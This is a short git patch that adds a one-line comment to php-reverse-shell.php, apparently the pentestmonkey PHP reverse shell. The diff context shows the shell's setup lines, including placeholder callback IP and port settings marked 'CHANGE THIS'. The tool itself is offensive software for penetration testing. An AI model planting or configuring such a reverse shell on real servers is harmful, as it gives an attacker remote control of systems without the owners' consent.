From bd6ccfc7d9b3426f9a2ed71fa834cbe346252613 Mon Sep 17 00:00:00 2001 From: root Date: Sat, 5 Oct 2019 23:41:20 -0400 Subject: [PATCH] Added a comment --- php-reverse-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..ed77f2e 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -45,7 +45,7 @@ // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); -$VERSION = "1.0"; +$VERSION = "1.0"; //Specifies the version $ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400;